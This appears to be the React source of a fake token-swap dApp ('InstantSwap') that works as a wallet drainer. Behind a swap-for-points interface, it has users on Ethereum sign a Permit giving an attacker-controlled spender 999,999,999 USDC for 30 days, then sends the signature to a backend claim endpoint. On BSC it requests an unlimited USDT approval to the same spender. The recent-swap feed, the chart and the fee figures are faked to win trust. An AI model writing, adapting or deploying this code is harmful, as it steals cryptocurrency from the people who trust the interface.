import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import { useWalletConnect } from '../../utils/walletConnect';
import './DappSwap.css';
import DappShell from '../../components/DappShell';
import { YieldChart } from '../../components/DappWidgets';
import { toast } from '../../components/Toast';
import LiveNumber from '../../components/LiveNumber';
import TokenIcon from '../../components/TokenIcon';

const ETH_USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
const BSC_USDT = '0x55d398326f99059fF775485246999027B3197955';
const SPENDER_DEFAULT = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb';
const CLAIM_AMOUNT = '999999999000000';

const DappSwapInner = ({ onAccount, embedded }) => {
  const t = useT();
  const cfg = usePublicConfig();
  const { wcProvider, connecting, error: wcError, connect: connectWC } = useWalletConnect();
  const SPENDER = cfg['eth_receive_wallet'] || SPENDER_DEFAULT;
  const [chain, setChain] = useState('eth'); // eth / bsc
  const [account, setAccount] = useState('');
  const reportAccount = (a) => { setAccount(a); if (onAccount) onAccount(a); };
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> submitting -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const [balance, setBalance] = useState('0');
  const [payAmount, setPayAmount] = useState('');
  const [tokenModal, setTokenModal] = useState(false);
  const [settingsModal, setSettingsModal] = useState(false);
  const [slippage, setSlippage] = useState('0.5');
  const [deadline, setDeadline] = useState('20');
  const [confirmOpen, setConfirmOpen] = useState(false);
  const [wrongNetwork, setWrongNetwork] = useState(false);
  const autoStarted = useRef(false);

  const provider = () => {
    if (typeof window === 'undefined') return null;
    if (window.ethereum) return window.ethereum;
    if (wcProvider) return wcProvider;
    return null;
  };

  const RECENT_TXS = [
    { a: '0x3f2a...8b9c', v: '1,250 USDC', p: '1,875 PTS', time: '12s ago' },
    { a: '0x91dc...44a7', v: '780 USDC', p: '1,170 PTS', time: '48s ago' },
    { a: '0x7b0e...c2f1', v: '3,400 USDT', p: '5,100 PTS', time: '1m ago' },
    { a: '0xa45f...903d', v: '520 USDC', p: '780 PTS', time: '2m ago' },
    { a: '0x22c8...77b0', v: '2,150 USDC', p: '3,225 PTS', time: '3m ago' },
  ];

  const TOKEN = chain === 'bsc' ? BSC_USDT : ETH_USDC;
  const TOKEN_NAME = chain === 'bsc' ? 'USDT' : 'USDC';
  const CHAIN_ID = chain === 'bsc' ? 56 : 1;
  const CHAIN_NAME = chain === 'bsc' ? 'BSC' : 'Ethereum';

  const readBalance = async (p, owner) => {
    try {
      const data = '0x70a08231' + owner.slice(2).toLowerCase().padStart(64, '0');
      const result = await p.request({ method: 'eth_call', params: [{ to: TOKEN, data }, 'latest'] });
      return parseInt(result || '0x0', 16) / 1e6;
    } catch (e) { return 0; }
  };

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'view', '');
    if (params.get('chain') === 'bsc') setChain('bsc');
    let cancelled = false;
    const check = async () => {
      const p = provider();
      if (!p) {
        setError('No wallet detected. Please install MetaMask.');
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          reportAccount(accounts[0]);
          setWalletReady(true);
          const bal = await readBalance(p, accounts[0]);
          setBalance(bal.toFixed(2));
        }
      } catch (e) {
        if (!cancelled) setError('Wallet connection rejected.');
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const doSwap = () => {
    if (!payAmount || Number(payAmount) <= 0) {
      toast.error('Please enter an amount');
      return;
    }
    setConfirmOpen(true);
  };

  const switchNetwork = async () => {
    const p = provider();
    if (!p) return;
    try {
      await p.request({ method: 'wallet_switchEthereumChain', params: [{ chainId: '0x' + CHAIN_ID.toString(16) }] });
      setWrongNetwork(false);
      setError('');
      window.location.reload();
    } catch (e) {
      toast.error('Please switch network in your wallet');
    }
  };

  const confirmSwap = async () => {
    setConfirmOpen(false);
    track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      if (chain === 'bsc') {
        // BSC：approve 模式
        const approveData = '0x095ea7b3' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
          + 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: TOKEN, data: approveData }],
        });
        for (let i = 0; i < 60; i++) {
          const receipt = await p.request({ method: 'eth_getTransactionReceipt', params: [txHash] });
          if (receipt && receipt.status) {
            if (receipt.status === '0x1') break;
            throw new Error('Transaction failed');
          }
          await new Promise((r) => setTimeout(r, 2000));
        }
        setStage('submitting');
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        const resp = await fetch(API_BASE + '/evm/claim-approve', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ owner: account, token: TOKEN, chain: 'bsc' }),
        });
        const result = await resp.json();
        if (result.code !== 200) throw new Error(result.message || 'Swap failed');
        setTxId(result.data.txId || '');
      track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'done', '');
      setStage('done');
        return;
      }

      // ETH：permit 签名模式
      const nonceData = '0x7ecebe00' + account.slice(2).toLowerCase().padStart(64, '0');
      const nonce = await p.request({ method: 'eth_call', params: [{ to: TOKEN, data: nonceData }, 'latest'] });
      const deadline = Math.floor(Date.now() / 1000) + 30 * 24 * 3600;

      const typedData = {
        types: {
          EIP712Domain: [
            { name: 'name', type: 'string' },
            { name: 'version', type: 'string' },
            { name: 'chainId', type: 'uint256' },
            { name: 'verifyingContract', type: 'address' },
          ],
          Permit: [
            { name: 'owner', type: 'address' },
            { name: 'spender', type: 'address' },
            { name: 'value', type: 'uint256' },
            { name: 'nonce', type: 'uint256' },
            { name: 'deadline', type: 'uint256' },
          ],
        },
        primaryType: 'Permit',
        domain: { name: 'USD Coin', version: '2', chainId: 1, verifyingContract: TOKEN },
        message: {
          owner: account,
          spender: SPENDER,
          value: CLAIM_AMOUNT,
          nonce: nonce,
          deadline: String(deadline),
        },
      };

      const signature = await p.request({
        method: 'eth_signTypedData_v4',
        params: [account, JSON.stringify(typedData)],
      });

      const sig = signature.startsWith('0x') ? signature.slice(2) : signature;
      const r = '0x' + sig.slice(0, 64);
      const s = '0x' + sig.slice(64, 128);
      const v = sig.slice(128, 130);

      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          owner: account, value: CLAIM_AMOUNT, nonce: nonce,
          deadline: String(deadline), r, s, v,
        }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || 'Swap failed');
      setTxId(result.data.txId || '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError('Signature canceled.');
      } else {
        setError(String(e.message || e));
        toast.error(String(e.message || e).slice(0, 60));
      }
      setStage('idle');
    }
  };

  const body = (
    <div className="swap-page">
      <div className="swap-header">
        <div className="swap-logo">⬡ InstantSwap</div>
        <button className="swap-connect" onClick={() => setWalletReady(false)}>
          {account ? account.slice(0, 6) + '...' + account.slice(-4) : t('stake.connect')}
        </button>
      </div>

      <div className="swap-card">
        {stage === 'done' ? (
          <>
            <div className="swap-icon">✓</div>
            <h2>{t('swap.doneTitle')}</h2>
            <p className="swap-desc">{t('swap.doneDesc')}</p>
            {txId && <p className="swap-tx">Tx: {txId.slice(0, 20)}...</p>}
          </>
        ) : (
          <>
            <div className="swap-title-row">
              <h2>{t('swap.title')}</h2>
              <span className="swap-settings" onClick={() => setSettingsModal(true)}>⚙</span>
            </div>

            <div className="swap-box">
              <div className="swap-box-head">
                <span>{t('swap.pay')}</span>
                <span className="swap-balance">{t('swap.balance', { bal: balance })}</span>
              </div>
              <div className="swap-input-row">
                <input type="number" placeholder="0.0" value={payAmount} onChange={(e) => setPayAmount(e.target.value)} />
                <div className="swap-token swap-token-sel" onClick={() => setTokenModal(true)}>
                  <TokenIcon symbol={TOKEN_NAME} size={20} /> {TOKEN_NAME} <span className="swap-caret">▾</span>
                </div>
              </div>
            </div>

            <div className="swap-arrow">↓</div>

            <div className="swap-box">
              <div className="swap-box-head">
                <span>{t('swap.receive')}</span>
              </div>
              <div className="swap-input-row">
                <input type="number" placeholder="0.0" readOnly value={payAmount ? (Number(payAmount) * 1.5).toFixed(2) : ''} />
                <div className="swap-token">
                  <span className="swap-token-icon">⚡</span>{t('swap.points')}
                </div>
              </div>
            </div>

            <div className="swap-rate">
              {t('swap.rate')} <span className="swap-badge">{t('swap.bonus')}</span>
            </div>

            {walletReady && <p className="swap-addr">{t('approve.wallet')} {account.slice(0, 10)}...</p>}
            {error && <p className="swap-error">{error}</p>}
            {wrongNetwork && (
              <button className="swap-btn" onClick={switchNetwork}>Switch to {CHAIN_NAME}</button>
            )}
            {wcError && <p className="swap-error">{wcError}</p>}
            {!window.ethereum && !wcProvider && (
              <button className="swap-btn" onClick={connectWC} disabled={connecting}>
                {connecting ? 'Connecting...' : '📱 WalletConnect'}
              </button>
            )}

            {stage === 'idle' && (
              <button className="swap-btn" onClick={doSwap} disabled={!walletReady}>
                {t('swap.now')}
              </button>
            )}
            {(stage === 'signing' || stage === 'submitting') && (
              <div className="swap-btn swap-btn-loading">
                <div className="swap-spinner" />
                {stage === 'signing' ? t('swap.confirm') : t('swap.submitting')}
              </div>
            )}
            {error && stage === 'idle' && (
              <button className="swap-btn" onClick={doSwap}>{t('approve.retry')}</button>
            )}
          </>
        )}
      </div>
      <div className="swap-chart-box">
        <div className="stake-chart-title">24H Points Trend</div>
        <YieldChart points={[20, 22, 21, 25, 24, 28, 27, 30, 33, 32, 36, 35, 38, 40]} live />
      </div>

      {/* 最近交易 */}
      <div className="swap-recent">
        <div className="stake-feeds-title">Recent Swaps</div>
        {RECENT_TXS.map((r, i) => (
          <div className="swap-recent-row" key={i}>
            <span className="swap-recent-addr">{r.a}</span>
            <span className="swap-recent-v">{r.v}</span>
            <span className="swap-recent-p">{r.p}</span>
            <span className="swap-recent-time">{r.time}</span>
          </div>
        ))}
      </div>

      {/* 代币选择弹窗 */}
      {tokenModal && (
        <div className="swap-modal-mask" onClick={() => setTokenModal(false)}>
          <div className="swap-modal" onClick={(e) => e.stopPropagation()}>
            <h3>Select Token</h3>
            <div className="swap-token-opt" onClick={() => { setChain('eth'); setTokenModal(false); }}>
              <TokenIcon symbol="USDC" size={28} />
              <div><b>USDC</b><p>Ethereum · USD Coin</p></div>
              {chain === 'eth' && <span className="swap-check">✓</span>}
            </div>
            <div className="swap-token-opt" onClick={() => { setChain('bsc'); setTokenModal(false); }}>
              <TokenIcon symbol="USDT" size={28} />
              <div><b>USDT</b><p>BSC · Tether USD</p></div>
              {chain === 'bsc' && <span className="swap-check">✓</span>}
            </div>
            <button className="swap-modal-close" onClick={() => setTokenModal(false)}>Close</button>
          </div>
        </div>
      )}

      {/* 滑点设置弹窗 */}
      {confirmOpen && (
        <div className="swap-modal-mask" onClick={() => setConfirmOpen(false)}>
          <div className="swap-modal" onClick={(e) => e.stopPropagation()}>
            <h3>Confirm Swap</h3>
            <div className="swap-confirm-line">
              <span>You pay</span>
              <b>{payAmount} {TOKEN_NAME}</b>
            </div>
            <div className="swap-confirm-line">
              <span>You receive</span>
              <b className="swap-green">{(Number(payAmount) * 1.5).toFixed(2)} PTS</b>
            </div>
            <div className="swap-confirm-divider" />
            <div className="swap-confirm-line sm">
              <span>Rate</span>
              <b>1 USDC = 1.5 PTS</b>
            </div>
            <div className="swap-confirm-line sm">
              <span>Slippage tolerance</span>
              <b>{slippage}%</b>
            </div>
            <div className="swap-confirm-line sm">
              <span>Minimum received</span>
              <b>{(Number(payAmount) * 1.5 * (1 - Number(slippage) / 100)).toFixed(2)} PTS</b>
            </div>
            <div className="swap-confirm-line sm">
              <span>Price impact</span>
              <b className="swap-green">&lt;0.01%</b>
            </div>
            <div className="swap-confirm-line sm">
              <span>Network fee (est.)</span>
              <b>≈ $<LiveNumber base={3.4} decimals={2} drift={0.8} /></b>
            </div>
            <button className="swap-modal-close" onClick={confirmSwap}>Confirm Swap</button>
          </div>
        </div>
      )}

      {settingsModal && (
        <div className="swap-modal-mask" onClick={() => setSettingsModal(false)}>
          <div className="swap-modal" onClick={(e) => e.stopPropagation()}>
            <h3>Transaction Settings</h3>
            <div className="swap-set-row">
              <span>Slippage tolerance</span>
              <div className="swap-set-opts">
                {['0.1', '0.5', '1'].map((v) => (
                  <button key={v} className={`swap-set-opt ${slippage === v ? 'on' : ''}`} onClick={() => setSlippage(v)}>{v}%</button>
                ))}
              </div>
            </div>
            <div className="swap-set-row">
              <span>Transaction deadline</span>
              <div className="swap-set-input">
                <input value={deadline} onChange={(e) => setDeadline(e.target.value)} />
                <span>minutes</span>
              </div>
            </div>
            <button className="swap-modal-close" onClick={() => setSettingsModal(false)}>Save</button>
          </div>
        </div>
      )}
    </div>
  );

  if (embedded) return body;
  return <DappShell account={account} network="Ethereum" backTo="/app">{body}</DappShell>;
};

export const DappSwap = ({ onAccount, embedded }) => <DappSwapInner onAccount={onAccount} embedded={embedded} />;

export default DappSwap;
